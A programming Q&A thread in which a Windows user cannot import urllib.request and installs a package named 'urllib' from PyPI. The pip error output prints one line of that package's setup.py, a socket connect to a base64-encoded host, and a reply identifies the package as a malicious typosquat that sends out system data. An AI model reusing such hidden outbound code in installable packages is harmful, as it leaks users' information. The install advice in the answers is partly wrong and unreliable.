# python 3 installed in 2 different locations - error with module

Tags: python-3.x, module, urllib

I am trying to learn about the urllib module in python 3.6 in windows
i am able to install the module and run the code using the python application but when i run python from command at the code's location it errors and says the module isnt intalled. I have searched for all python.exe files on my PC and there is only 1.

```
c:\Python36\Scripts>python
Python 3.6.2 (v3.6.2:5fd33b5, Jul  8 2017, 04:57:36) [MSC v.1900 64 bit 
(AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import urllib 
>>>
>>> ^Z

c:\Python36\Scripts>
c:\Python36\Scripts>cd c:\Python36\Juggles\

c:\Python36\Juggles>python urllib.py
Traceback (most recent call last):
File "urllib.py", line 1, in <module>
import urllib.request
File "c:\Python36\Juggles\urllib.py", line 1, in <module>
import urllib.request
ModuleNotFoundError: No module named 'urllib.request'; 'urllib' is not a 
package

c:\Python36\Juggles>
c:\Python36\Juggles>python
Python 3.6.2 (v3.6.2:5fd33b5, Jul  8 2017, 04:57:36) [MSC v.1900 64 bit 
(AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import urllib
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "c:\Python36\Juggles\urllib.py", line 1, in <module>
import urllib.request
ModuleNotFoundError: No module named 'urllib.request'; 'urllib' is not a 
package
>>>
>>>
>>> import urllib.request
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "c:\Python36\Juggles\urllib.py", line 1, in <module>
import urllib.request
ModuleNotFoundError: No module named 'urllib.request'; 'urllib' is not a 
package
>>>
>>> x = urllib.request.urlopen('https://www.google.com')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'urllib' is not defined
>>>
>>> print(x.read())
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'x' is not defined
>>>
```

Basically i installed the module using pip in the cmd > python pip.exe install..
Then i checked using import urllib and there were no errors
Then i went to the location of the code using cd and ran python urllib.py
and it says the module isnt installed.
Then i went into python again and it says the module isnt intalled.
But it was before... where did it go?
what am i doing wrong?

i also tried the -m option as suggested below but i get this error

```
c:\Python36\Scripts>python -m pip install urllib
Collecting urllib
Using cached urllib-1.21.1.tar.gz
Complete output from command python setup.py egg_info:
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "C:\Users\butte\AppData\Local\Temp\pip-build-
 ejdu38tm\urllib\setup.py", line 191
    s.connect((base64.b64decode(rip), 017620))
                                           ^
SyntaxError: invalid token

----------------------------------------
Command "python setup.py egg_info" failed with error code 1 in 
C:\Users\Juggles\AppData\Local\Temp\pip-build-ejdu38tm\urllib\
```

It is trying to do something in c:\users which isnt where the python.exe should be running from, which made me wonder if there was another version somewhere i cant seem to locate

I also just tried with elevated cmd from a new window (i always open cmd as admin) and get the same error below

```
C:\windows\system32>python
Python 3.6.2 (v3.6.2:5fd33b5, Jul  8 2017, 04:57:36) [MSC v.1900 64 bit 
(AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
   >>> import urllib
   >>> import urllib.request

c:\Python36\Juggles>python urllib.py
Traceback (most recent call last):
File "urllib.py", line 1, in <module>
import urllib.request
File "c:\Python36\Juggles\urllib.py", line 1, in <module>
import urllib.request
ModuleNotFoundError: No module named 'urllib.request'; 'urllib' is not a 
package
```

Comment: please remove unrelated lines from your questions. you have posted so many lines which is somewhat unreadable

Answer (score 0):

Try `python -m pip install package`

Comment: i get the egg.info error when i do that
tries to install in c:\users, etc
not in c:\python36

Comment: i didnt think it would make sense without all the output sorry...
the first part is showing that import urllib works without error, then below it i go to the location and try to run the code from there and now it doesn't work.=, etc

Comment: please post the above reply to the comment under your question

Comment: yes still the same
it has to be something to do with how cmd runs python as opposed to running it just from IDLE or the Python application, etc

Answer (score 0):

There are two points to make in order to answer your question:

**1. The urllib package you installed is a fake**

The package you tried to install was a maliciously created python package that was designed to look like a real package (in this case [urllib3](https://pypi.python.org/pypi/urllib3/1.22)). When installed, the package tried to send some basic information about the system on which you installed the package to a URL (you can see more details on this [here](https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=44294872&owner=Common%20Community)). You can read more about this fake package at either of the following links:

- https://app.threatconnect.com/auth/incident/incident.xhtml?incident=5256822&owner=Common%20Community (you can sign up for a free account to view this one)
- http://www.nbu.gov.sk/skcsirt-sa-20170909-pypi/index.html

Sending basic information about your systems to an unknown source isn't the *worst* thing you could do, but is certainly something you want to avoid when possible.

**2. To properly install a package...**

- Specifically urllib:

  To install urllib, you need to specify the version of urllib you would like to install. For example, `pip install urllib3` or `pip install urllib2`.
- Any package in general:

  One helpful tool is the `pip search <package-name>` feature which lets you view the available packages that match a given name. This is not perfect, however, as it may list malicious libraries like the one you had installed. A good guideline is that you should follow the installation instructions in a package's documentation closely to avoid any unforeseen issues. This is just an unfortunate necessity of living in a world where people make pretend python packages.